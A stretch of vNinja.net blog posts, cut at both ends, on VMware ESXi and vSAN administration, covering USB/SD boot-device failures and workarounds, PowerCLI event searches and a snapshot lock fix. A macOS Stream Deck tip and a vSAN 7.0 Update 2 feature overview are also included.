esxcfg-rescan -d vmhba32 Rescan complete, however some dead paths were not removed because they were in use by the system. Please use the 'storage core device world list' command to see the VMkernel worlds still using these paths. Check for any process (worlds) currently using the device # [root@esx-14:~] localcli storage core device world list|egrep -ie '(device|mpx)' Device World ID Open Count World Name mpx.vmhba32:C0:T0:L0 1051918 1 hostd mpx.vmhba32:C0:T0:L0 1424916 1 localcli Here we see that device mpx.vmhba32:C0:T0:L0 is being used by hostd (with PID 1051918) Tip: You may also just run the command localcli storage core device world list, and check the output. I simply added a filter on device & mpx only, to limit output. Restart hostd, if needed (or any other processes locking the device) # [root@esx-14:~] /etc/init.d/hostd restart watchdog-hostd: Terminating watchdog process with PID 1051906 1051182 hostd stopped. /usr/lib/vmware/hostd/bin/create-statsstore.py:30: DeprecationWarning: pyvsilib is replaced by vmware.vsi import pyvsilib as vsi hostd started. Re-check if any process is still using the device # [root@esx-14:~] localcli storage core device world list|egrep -ie '(device|mpx)' Device World ID Open Count World Name Note: After restarting the hostd process in my case, I needed to wait another 2-3 minutes, sometimes, before the world was actually stopped, and the process was no longer using vmhba32 (guessing another timeout). Results # Commands like df -h etc. should now work, and you may set the host in maintenance mode, completing vMotion & evacuating VMs as usual (which was stuck before), or do “CLI stuff”. Other procedures which might have failed before, now may start working again. So after vmhba32 is “flagged as failed”, you may Enter maintenance mode, if needed. Evacuate VMs/vMotion, etc, as usual. Take snapshots of VMs. Pre-checks (scripts) work. Do CLI commands (which previouly got stuck). Reboot host. Also: After VMware releases a fix for this, I simply plan to reboot the host first (makes the device working again) , then apply the patch, etc. Hopefully it won’t be that long, until a fix is released. For now, I’ll apply this “workaround” in my environment, which seems to be better than stale IOs againt the ESXi, including the repercussion (failing processes), and possible mutiple reboots needed, etc. --- # Searching vCenter Tasks and Events via PowerShell and GridView URL: https://vNinja.net/2021/05/19/searching-vcenter-tasks-and-events-via-powershell/ Date: 2021-05-19 Author: Tags: PowerCLI, vCenter, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. As searching and filtering for events in vCenter Server trough vSphere Client somewhat limited (OK, it really sucks, to be honest), it’s usually much faster using PowerCLI, to retrieve, filter & searching events. The basics. Connecting to vCenter Server via PowerCLI, and get some events # Connecting to vCenter Connect-VIServer vc-02.esod.local Getting the last 1337 events from vCenter Get-VIEvent -MaxSamples 1337 Getting the last 1337 events from a ESXi host Get-VMHost esx-11.esod.local | Get-VIEvent -MaxSamples 1337 Getting the last 1337 events from a VM Get-VM dc-02.esod.local | Get-VIEvent -MaxSamples 1337 Knowing there is more… # Since this is basically PowerShell output, you may filter in any way you like, as you might already know, through regular PowerShell. Check all the objects I may retrieve, just for this event first event. PS /Users/esod> Get-VMHost esx-11.esod.local | Get-VIEvent -MaxSamples 1 EventTypeId : com.vmware.vc.TaHostAttestUnsetEvent Severity : info Message : Arguments : ObjectId : host-4373 ObjectType : HostSystem ObjectName : esx-11.esod.local Fault : Key : 592127 ChainId : 592127 CreatedTime : 05/19/2021 08:23:42 UserName : Datacenter : VMware.Vim.DatacenterEventArgument ComputeResource : VMware.Vim.ComputeResourceEventArgument Host : VMware.Vim.HostEventArgument Vm : Ds : Net : Dvs : FullFormattedMessage : Trusted Host attestation status unset. ChangeTag : Adding a filter, to get events, performed by a specific domain (or user) PS /Users/esod> Get-VIEvent | Where-Object UserName -ilike "esod\*" | Select-Object CreatedTime,ipaddress,username,fullformattedmessage -Last 3 CreatedTime IpAddress UserName FullFormattedMessage ----------- --------- -------- -------------------- 05/19/2021 08:15:15 10.0.1.115 ESOD\svc-vmw-log User ESOD\svc-vmw-log@10.0.1.115 logged in as JAX-WS RI 2.2.9-b130926.1035 svn-revision#5f6196f2b90e9460065a4c2f4e30e065b245e51e 05/19/2021 08:14:00 10.0.1.114 ESOD\svc-vmw-vrops User ESOD\svc-vmw-vrops@10.0.1.114 logged out (login time: Wednesday, 19 May, 2021 06:13:59 AM, number of API invocations: 6, user agent: VMware vim-java 1.0) 05/19/2021 08:13:59 10.0.1.114 ESOD\svc-vmw-vrops User ESOD\svc-vmw-vrops@10.0.1.114 logged in as VMware vim-java 1.0 Bonus: If you’re on MacOS and need GridView # Another, maybe cooler way to filter (well, I usually do this), is to just pipe the output to GridView (runs in RAM, hence really, really fast to search), and just apply some filters there. Applying, or re-applying search filter(s), is just as easy as typing something new, on the keyboard. Notes: Steps below is performed from pwsh on my MacOS (does not have Out-GridView by default), hence this might look If you’re using Windows, you’ll native have the “Out-Gridview” by default - great! Use that! If you’re on MacOS (like I am), I previously used to install the module “Microsoft.PowerShell.GraphicalTools” Install-Module Microsoft.PowerShell.GraphicalTools Now this used to work just fine, but I’m currently having trouble getting this to play nice in MacOS Catalina (keeps crashing, etc.). I recently dicovered another cool tool (if using pwsh from MacOS), called Out-ConsoleGridView, released back in 2020. Install-Module Microsoft.PowerShell.ConsoleGuiTools I can now pipe a lot of output to the new “Out-ConsoleGridView”. Let’s retry the Get-VIEvent, but increase the output to last 999 events Get-VIEvent | Where-Object UserName -ilike "esod\*" | Select-Object CreatedTime,ipaddress,username,fullformattedmessage -Last 999 | Out-ConsoleGridView As you can see from the output below, I now have the possibility to filter on “anything”, hence I can throw more output into the GridView, and filter there (in RAM, which is much faster then polling output, again and again). I may now filter on e.g. the IP, ending in 1.99, by just typing 1.99in the Filter box. Related articles, discussing topics in more detail # https://devblogs.microsoft.com/powershell/introducing-consoleguitools-preview/ https://www.vembu.com/blog/vsphere-tasks-and-events-tips-to-track/ https://devblogs.microsoft.com/powershell/out-gridview-returns/ --- # ESXi 7.0 U2a Potentially Killing USB and SD drives! URL: https://vNinja.net/2021/05/18/esxi-7.0-u2a-killing-usb-and.sd-drives/ Date: 2021-05-18 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. Workaround per 01. June 2021 # As VMware has not released a fix yet (regarding issues with SD card and USB drive), I’m still experiencing issues with ESXi 7.0 U2a Potentially Killing USB and SD drives, running from USB or SD card installs. As previous workaround (copying VMware Tools to RAMDISK with option ToolsRamdisk) only worked for 8 days (in my case), I needed something more “permanent”, to get the ESXi-hosts more “stable” (e.g. host being able to enter maintenance mode, move VMs around, snapshots/backup, doing CLI-stuff/commands, etc.). See ESXi 7.0 SD Card/USB Drive Issue Temporary Workaround for details. After upgrading my 4-node vSAN-cluster (homelab) to ESXi 7.0 build 17867351 U2a, I detected that ESXi had issues talking to the USB device, where ESXi was installed. I found a related KB from VMware, outlining issues with the new VMFS-L, which started my baseline for troubleshooting VMFS-L Locker partition corruption on SD cards in ESXi 7.0 (83376) In short, it says that the VMFS-L partition may have become corrupt, and a re-install is needed. There is no resolution for the SD card corruption as of the time this article was published Mentioned workaround, suggesting moving the scratch partition, is not applicable in my case, as I’ve already verified that my scratch partition is running from RAMDISK. Verify scratch mountpoint [root@esx-13:~] vmkfstools -Ph /scratch/ visorfs-1.00 (Raw Major Version: 0) file system spanning 1 partitions. File system label (if any): Mode: private Capacity 3.9 GB, 3.1 GB available, file block size 4 KB, max supported file size 0 bytes Disk Block Size: 4096/4096/0 UUID: 00000000-00000000-0000-000000000000 Partitions spanned (on "notDCS"): memory Is Native Snapshot Capable: NO List content of the VMFS-L partition (LOCKER) I also ran a quick findcommand (from another working host), to get all contents of the VMFS-L mounted partition. Notice that the vmtoolsRepo packages are located here. [root@esx-11:~] find /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/ /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/ /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.fbb.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.fdc.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.pbc.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.sbc.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.vh.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.pb2.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.sdd.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.jbc.sf /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml.sig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml.orig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/bulletins /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/profiles /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/baseimages /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/addons /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/solutions /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/manifests /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/reservedComponents /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/reservedVibs /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-Windows2008.flp /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-Windows8.flp /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-WindowsVista.flp /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/isoimages_manifest.txt /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/isoimages_manifest.txt.sig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso.sig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux_avr_manifest.txt /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso.sha /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux_avr_manifest.txt.sig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso.sha /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso.sig /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows_avr_manifest.txt /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows_avr_manifest.txt.sig Getting a host with issues in maintenance mode — physically remove the USB device first # Getting the ESXi hosts with USB issues into maintenance mode, was also a little tricky. Used to doing things “remote”, I wanted to try evacuating the VMs the usual way (just enter maintenance mode, and DRS will handle the rest), but this was a no-go. While entering maintenance mode, the VMs would start being vMotioned (job status), but nothing actually happened. All VMs “started” the Migrating/vMotion job (status 9%, or 12% in vCenter), but checking the host with esxtop, under network, I found that no traffic was occuring on the vMotion interface, which usually is at full pipe, when vMotion occurs. Re-checking the logs, the issues with USB repeated, again and again. I thought I’d try to physically remove the USB device from the host, as this would trigger an “proper” All Paths Down (APD) on the USB device. So I physically removed the USB device. Waited 2-3 minutes, and boom - the vMotion process finished at once. Digging into the logs (again, /var/log/vmkernel.log has the answers), I could verify the APD event. 2021-05-15T14:00:03.326Z cpu7:1048720)StorageApdHandler: 606: APD timeout event for 0x43040c4c34d0 [mpx.vmhba32:C0:T0:L0] 2021-05-15T14:00:03.326Z cpu7:1048720)StorageApdHandlerEv: 126: Device or filesystem with identifier [mpx.vmhba32:C0:T0:L0] has entered the All Paths Down Timeout state after being in the All Paths Down state for 140 seconds. I/Os will now be fast faile$ 2021-05-15T14:00:03.326Z cpu3:1048731)ScsiDeviceIO: 4277: Cmd(0x4578c1283080) 0x1a, CmdSN 0x93be0 from world 0 to dev "mpx.vmhba32:C0:T0:L0" failed H:0x5 D:0x0 P:0x0 2021-05-15T14:00:03.326Z cpu3:1048731)WARNING: NMP: nmp_DeviceStartLoop:740: NMP Device "mpx.vmhba32:C0:T0:L0" is blocked. Not starting I/O from device. 2021-05-15T14:00:03.326Z cpu3:1055182)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1. 2021-05-15T14:00:03.326Z cpu3:1055182)LVM: 6192: Could not open device mpx.vmhba32:C0:T0:L0:7, vol [6092ba2a-e004ead6-09c5-000c292b45b0, 6092ba2a-e004ead6-09c5-000c292b45b0, 1]: No connection 2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 2129: Could not open device 'mpx.vmhba32:C0:T0:L0:7' for volume open: Not found 2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 4339: Failed to get object 28 type 1 uuid 6092ba2b-1fdb3f52-337c-000c292b45b0 FD 0 gen 0 :Not found 2021-05-15T14:00:03.326Z cpu3:1055182)WARNING: Fil3: 1534: Failed to reserve volume f533 28 1 6092ba2b 1fdb3f52 c00337c b0452b29 0 0 0 0 0 0 0 2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 4339: Failed to get object 28 type 2 uuid 6092ba2b-1fdb3f52-337c-000c292b45b0 FD 4 gen 1 :Not found 2021-05-15T14:00:03.326Z cpu4:2205969)VFAT: 5144: Failed to get object 36 type 2 uuid 4365f3f4-494e65bd-7b92-e7c78fac244e cnum 0 dindex fffffffecdate 0 ctime 0 MS 0 :No connection 2021-05-15T14:00:03.326Z cpu3:1051988)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1. 2021-05-15T14:00:03.326Z cpu3:1051988)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1. So I got both hosts in maintenance mode, and rebooted. Everything was working again. New findings, from an old value # Continuing my research, I stumbled upon a new thread in the Dell Communities (VMware 7.0 U2 losing contact with SD card, where VMware Support sent a workaround from an older KB, related to moving vmtoolsrepo to RAMDISK. High frequency of read operations on VMware Tools image may cause SD card corruption (2149257) In ESXi 6.0 Update 3 and later, changes were made to reduce the number of read operations being sent to the SD card, an advanced parameter was introduced that allows you to migrate your VMware tools image to ramdisk on boot . This way, the information is read only once from the SD card per boot cycle. Note: Even though KB2149257 currently only targets ESXi 6.0 and 6.5 (doesn’t mention ESXi 7.0 at all, as of time of writing), I’m guessing the same workaround now may apply in ESXi 7.0 U1+. Especially if the old “throttle” (fix in 6.0 U3) now is removed, while continuing improving the new VMFS-L. Applying the workaround — adding option ToolsRamdisk # As mentioned in KB2149257, I added the ToolsRamdisk option on all hosts with ESXi 7.0 build 17867351 U2a Steps Creating the option first esxcfg-advcfg -A ToolsRamdisk --add-desc "Use VMware Tools repository from /tools ramdisk" --add-default "0" --add-type 'int' --add-min "0" --add-max "1" Setting the value to 1 esxcli system settings advanced set -o /UserVars/ToolsRamdisk -i 1 Verifiying the value is set esxcli system settings advanced list -o /UserVars/ToolsRamdisk Reboot the host (as setting applies at boot) Verify new tools mountpoint running from RAMDISK # After a reboot, I found the newly created mountpoint located under /tools. Checking the location with vmkfstools -Ph, we can see that it’s mounted in a RAMDISK. Checking mountpoint with ls [root@esx-11:~] ls -hal /tools/ total 16 drwxrwxrwt 1 root root 512 May 18 14:56 . drwxr-xr-x 1 root root 512 May 18 18:18 .. drwxr-xr-x 1 root root 512 May 18 14:56 floppies drwxr-xr-x 1 root root 512 May 18 14:56 vmtools Getting mountpoint location with vmkfstools -Ph [root@esx-11:~] vmkfstools -Ph /tools/ visorfs-1.00 (Raw Major Version: 0) file system spanning 1 partitions. File system label (if any): Mode: private Capacity 4.2 GB, 3.2 GB available, file block size 4 KB, max supported file size 0 bytes Disk Block Size: 4096/4096/0 UUID: 00000000-00000000-0000-000000000000 Partitions spanned (on "notDCS"): memory Is Native Snapshot Capable: NO Checking vmkernel.log for boot events, containg the word “tools” # Check vmkernel.log for tools-related hits [root@esx-11:~] cat /var/log/vmkernel.log|grep -i tools 2021-05-18T14:55:44.765Z cpu7:1048823)SchedVsi: 2098: Group: host/vim/vimuser/vmtoolsd(1725): min=46 max=46 minLimit=46, units: mb 2021-05-18T14:56:02.361Z cpu2:1048852)Activating Jumpstart plugin vmtoolsRepo. 2021-05-18T14:56:02.399Z cpu3:1049894)VisorFSRam: 871: tools with (0,286,0,256,1777) 2021-05-18T14:56:02.399Z cpu3:1049894)FSS: 8565: Mounting fs visorfs (430547881820) with -o 0,286,0,256,0,01777,tools on file descriptor 43054e9b9230 2021-05-18T14:56:15.302Z cpu3:1048852)Jumpstart plugin vmtoolsRepo activated. 2021-05-18T14:56:21.821Z cpu6:1050194)Starting service vmtoolsd 2021-05-18T14:56:21.830Z cpu6:1050194)Activating Jumpstart plugin vmtoolsd. 2021-05-18T14:56:21.852Z cpu4:1050194)Jumpstart plugin vmtoolsd activated. Listing content of the /tools directory [root@esx-11:~] find /tools/ /tools/ /tools/floppies /tools/floppies/pvscsi-WindowsVista.flp /tools/floppies/pvscsi-Windows2008.flp /tools/floppies/pvscsi-Windows8.flp /tools/vmtools /tools/vmtools/windows.iso.sig /tools/vmtools/linux.iso.sha /tools/vmtools/linux_avr_manifest.txt.sig /tools/vmtools/isoimages_manifest.txt.sig /tools/vmtools/linux.iso /tools/vmtools/linux_avr_manifest.txt /tools/vmtools/isoimages_manifest.txt /tools/vmtools/windows.iso /tools/vmtools/windows_avr_manifest.txt.sig /tools/vmtools/windows_avr_manifest.txt /tools/vmtools/windows.iso.sha /tools/vmtools/linux.iso.sig So yeah, there you have it. Perhaps using the standard profile on USB was a bad idea (which includes the VMware Tools - vs the “no-tools” profile). Usually I use the “no-tools” profile for USB installs, but I recently switched my USB devices to better SanDisk Ultra Fit SDCZ430-032G-G46 devices, which I thought was way better, and more stable. Bonus: Tips on proactivly detecting issues on existing USB and SD card installs # Tips: The followup might apply if there is issues with the USB or SD card in your environment Running command df -h from CLI will get stuck, or fail, for the LOCKER mount (VMFS-L partition) Checking the hosts logfile /var/log/vmkernel.log, you’ll notice entries similair to this 2021-05-15T13:48:27.674Z cpu6:1048743)ScsiDeviceIO: 4315: Cmd(0x4578c12ad880) 0x1a, cmdId.initiator=0x45389cb1a6f8 CmdSN 0x93a68 from world 0 to dev "mpx.vmhba32:C0:T0:L0" failed H:0x5 D:0x0 P:0x0 Cancelled from path layer. Cmd count Active:1 I suggest setting up a vRLI alert on exact match on Cancelled from path layer. Cmd count Active, which I only found on faulty hosts, for now. I’ve actually set up a webhook alert. So if any USB issues arises, I immediatly get notified in my Slack channel, so I can react on it early on. In summary # Installing ESXi, using the no-tools-image (e.g. ESXi-70U2a-17867351-no-tools) is probably better suited for USB/SD-card installs, and maybe not require the option/workaround provided above. User setting /UserVars/ToolsRamdisk outlined in KB2149257 loads vmtools to RAMDISK at boot (mounts under /tools), possible preventing burning out USB drives & SD cards (well, time will tell). A funeral may be needed for my USB devices. --- # ESXi: Error Occurred While Saving Snapshot Msg.changetracker URL: https://vNinja.net/2021/05/18/error-occurred-while-saving-snapshot-msg.changetracker.mirrorcopystatus/ Date: 2021-05-18 Author: Tags: vCenter, VMware, Snapshot, vSAN, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. I recently ran into a strange issue in my home lab, running ESXi 7.0.2, build 17867351 where Veeam Backup & Replication v10 reported the following error: Veeam Backup & Replication Log entries # 16.05.2021 17:34:50 :: Failed to create VM snapshot. Error: CreateSnapshot failed, vmRef vm-4013, timeout 1800000, snName VEEAM BACKUP TEMPORARY SNAPSHOT, snDescription Please do not delete this snapshot. It is being used by Veeam Backup., memory False, quiesce False The same error could also be seen in vCenter: vCenter Log entries # 16.05.2021 17:34:56 :: Error: An error occurred while saving the snapshot: msg.changetracker.MIRRORCOPYSTATUS. Findings # The same issue arrises when manually creating a snapshot in vCenter, so it does not seem to be Veeam Backup & Replication specific. A quick look into vmware.log for the affected VM: Full vmware.log for the affected VM # 2021-05-16T15:38:49.395Z| vmx| | I005: VigorTransportProcessClientPayload: opID=knxctxhk-242836-auto-57dh-h5:70044488-3a-9f-6432 seq=54938: Receiving Snapshot.Take request. 2021-05-16T15:38:49.397Z| vmx| | I005: SnapshotVMX_TakeSnapshot start: 'VM Snapshot 16%2f05%2f2021, 17:38:44', deviceState=0, lazy=0, quiesced=1, forceNative=0, tryNative=1, saveAllocMaps=0 2021-05-16T15:38:49.665Z| vmx| | I005: DISKLIB-LIB_CREATE : DiskLibCreateCreateParam: vmfsSparse grain size is set to 1 for '/vmfs/volumes/vsan:52b2da12ab7803d1-77d0a7d9896eb6ac/80f04160-c378-5f8b-871e-a4ae111c7980/idmc-01-000001.vmdk' 2021-05-16T15:38:49.852Z| vmx| | I005: DISKLIB-CBT :ChangeTrackerESX_CreateMirror: Created mirror node /vmfs/devices/svm/6d1716-25d0ef6-cbtmirror. 2021-05-16T15:38:49.953Z| vmx| | W003: DISKLIB-CBT : ChangeTrackerESX_GetMirrorCopyProgress: Failed to copy mirror: Lost previously held disk lock 2021-05-16T15:38:49.953Z| vmx| | I005: DISKLIB-LIB_BLOCKTRACK : DiskLibBlockTrackMirrorProgress: Failed to get mirror status of block track info file /vmfs/volumes/vsan:52b2da12ab7803d1-77d0a7d9896eb6ac/80f04160-c378-5f8b-871e-a4ae111c7980/idmc-01-ctk.vmdk. 2021-05-16T15:38:49.953Z| vmx| | I005: DISKLIB-CBT :ChangeTrackerESX_DestroyMirror: Destroyed mirror node 6d1716-25d0ef6-cbtmirror. 2021-05-16T15:38:49.976Z| vmx| | I005: SNAPSHOT: SnapshotPrepareTakeDoneCB: Failed to prepare block track. 2021-05-16T15:38:49.976Z| vmx| | I005: SNAPSHOT: SnapshotPrepareTakeDoneCB: Prepare phase complete (Could not get mirror copy status). 2021-05-16T15:38:49.976Z| vmx| | I005: SnapshotVMXPrepareTakeDoneCB: Prepare phase failed: Could not get mirror copy status (5). 2021-05-16T15:38:49.976Z| vmx| | I005: SnapshotVMXTakeSnapshotComplete: Done with snapshot 'VM Snapshot 16%2f05%2f2021, 17:38:44': 0 2021-05-16T15:38:49.977Z| vmx| | I005: SnapshotVMXTakeSnapshotComplete: Snapshot 0 failed: Could not get mirror copy status (5). 2021-05-16T15:38:49.977Z| vmx| | I005: VigorTransport_ServerSendResponse opID=knxctxhk-242836-auto-57dh-h5:70044488-3a-9f-6432 seq=54938: Completed Snapshot request with messages. And there I found the locking issue: 2021-05-16T15:38:49.953Z| vmx| | W003: DISKLIB-CBT : ChangeTrackerESX_GetMirrorCopyProgress: Failed to copy mirror: Lost previously held disk lock Resolution/workaround # Since the lock is held locally by the ESXi host, I just did a vMotion of the VM (to another host in my cluster), to clear the lock and re-issue it by another host. After completing a vMotion of the affected VM, it now completed successfully (and backup is now working again). My lab is running vSAN, so this does not seem related to VMware KB 2107795: Troubleshooting issues resulting from locked virtual disks. The root cause of the issue is still unknown, but a vMotion cleared the lock and backups have now been running successfully for a few days since the original issue appeared. Hopefully it stays that way! --- # Creating an Elgato Stream Deck Sleep Button in macOS URL: https://vNinja.net/2021/04/15/elgato-stream-deck-sleep-button/ Date: 2021-04-15 Author: christian Tags: Elgato, macOS, Stream Deck I recently got an Elgato Stream Deck for the home office, and I’ve set it up mostly to control OBS Studio for a couple of projects I’m working on. Since I also have a couple of Key Light Airs, I also use it to control them. While setting it up, I figured I needed a sleep button on it, that basically locks my Macbook and turns off the lights in one fell swoop. Conceptually this seemed like an very easy thing to set up, but it turns out there are some macOS quirks that needs to be addressed for this to work. By default in macOS High Sierra, or newer, there is a predefined lock screen hotkey: Command ⌘ + Control ⌃ Q which works very well. In fact, it works a little to well as it turns out. The problem was, that when I tried to enter Command ⌘ + Control ⌃ Q as the hotkey combination in my button settings in the Stream Deck configuration, the screen locked. Naturally. And Stream Deck never recorded the hotkey, since it automatically locked the MacBook. Luckily, there was a somewhat convoluted but at the same time pretty easy fix for this. Creating a Lock/Sleep button for Stream Deck # Assign a temporary lock hotkey You will first need to temporarily assign a new hotkey for the lock screen, in order to ensure that macOS doesn’t lock the screen when hitting the original hotkey to record it in Stream Deck. To do this navigate to System Preferences -> Keyboard -> App Shortcuts. Counterintuitively select to add a new hotkey by clicking the + sign Under Menu Title, enter Lock Screen This is important, as it needs to match the existing menu item. Then under Keyboard Shortcut, enter a new key combination that you can assign temporarily. In this example I used Command ⌘ + Control ⌃ L, but it can be anything. Then click on add Create a Multi Action button in Stream Deck Add a System -> Hotkey to the Multi Action button, and assign it the Command ⌘ + Control ⌃ Q hotkey. This time macOS won’t lock up, since the the hotkey for locking as been temporarily changed to whatever you chose in step 1. In my case, I also added a Stream Deck -> Control Center: On / Off button as well, as I wanted to make sure my Key Lights got turned off at the same time. Close the Stream Deck app. Go back to System Preferences -> Keyboard -> App Shortcuts and delete the temporary Lock Screen definition, to restore the original Command ⌘ + Control ⌃ Q hotkey to macOS and profit! Now your new Stream Deck Sleep/Lock button should work, in addition to the original macOS hotkey assignment. A bit counter intuitive at first glance, but it makes sense that the hotkey for locking the screen needs to be disabled to be able to record it into the Stream Deck App. --- # VMware vSAN 7.0 Update 2 Announced URL: https://vNinja.net/2021/03/09/vmware-vsan7u2-announced/ Date: 2021-03-09 Author: christian Tags: vSphere, vSAN, VMware, ESXi VMware vSAN 7.0 Update 2 has been made generally available, and what is new this time around? Disaggregated HCI, Durable Writes, Enhanced File Services, Efficiency Enhancements, vSAN over RDMA and more! Below is a quickfire list of new features and enhancements. As is customary, a new vSphere release comes with a new vSAN release as well. The vSAN VCG Notification Service has already been updated with the vSAN 7.0 Update 2 details: vSAN VCG Notification Service 9th of March 2021 What’s new in vSAN 7.0 Update 2? # Disaggregated HCI # Perhaps an oxymoron in itself, but vSAN 7 Update 2 comes with a new Disaggregated HCI option. When vSAN HCI Mesh was announced back in September 2020 it was positioned is a way of sharing vSAN capacity between independent vSAN enabled clusters, but in 7.0 Update 2 VMware takes this further. In this new release it will be possible to share vSAN storage from a vSAN enabled cluster to non-vSAN clusters as well, over the vSAN network/protocols. No iSCSI or NFS in the picture here, just pure unadulterated vSAN traffic. HCI Mesh Overview Up to 128 hosts can be connected to a remote vSAN datastore Storage Policy Integrations with Deduplication & Compression or compression-only settings Data-at-rest encryption is supported Supported on both Hybrid or all-flash vSAN configurations No vSAN license needed for HCI Mesh compute clusters The real kicker here is the last item in the list above. There is no requirement for vSAN licensing in remote clusters that consume vSAN storage. vSAN Enterprise, or Enterprise Plus, licensing is required on the vSAN enabled cluster itself. vSAN 7 Update 2 Configure Client Cluster As the screenshot above shows, space efficiency, Data-At-Rest encryption, Data-In-Transit encryption and Large scale cluster support policies are defined on the destination (possibly non-vSAN) cluster, and not the source vSAN Cluster. Being able to consume vSAN resources from other clusters in the environment is a great feature enhancement, and can potentially have huge design implications for a lot of customers going forward. vSAN 7 Update 2 HCI Mesh Compute Capacity Having compute-only and storage-enabled clusters provides a new level of flexibility, and scalability. Consider a blade heavy environment where vSAN support is limited, those blades can now consume storage over Ethernet from a vSAN Cluster even if their own HBA’s and are not on the HCL. Monitoring is also taken care of, even from the remote clusters perspective. vSAN 7 Update 2 Compute Cluster Performance Monitoring VMware has also published a video showing the setup Enhanced Data Durability During Unplanned environments (Durable Writes) # This is a big one, as it offers a new way of maintaining the latest written data, redundantly, in the event of an unplanned transient error or outage. vSAN 7 Update 2 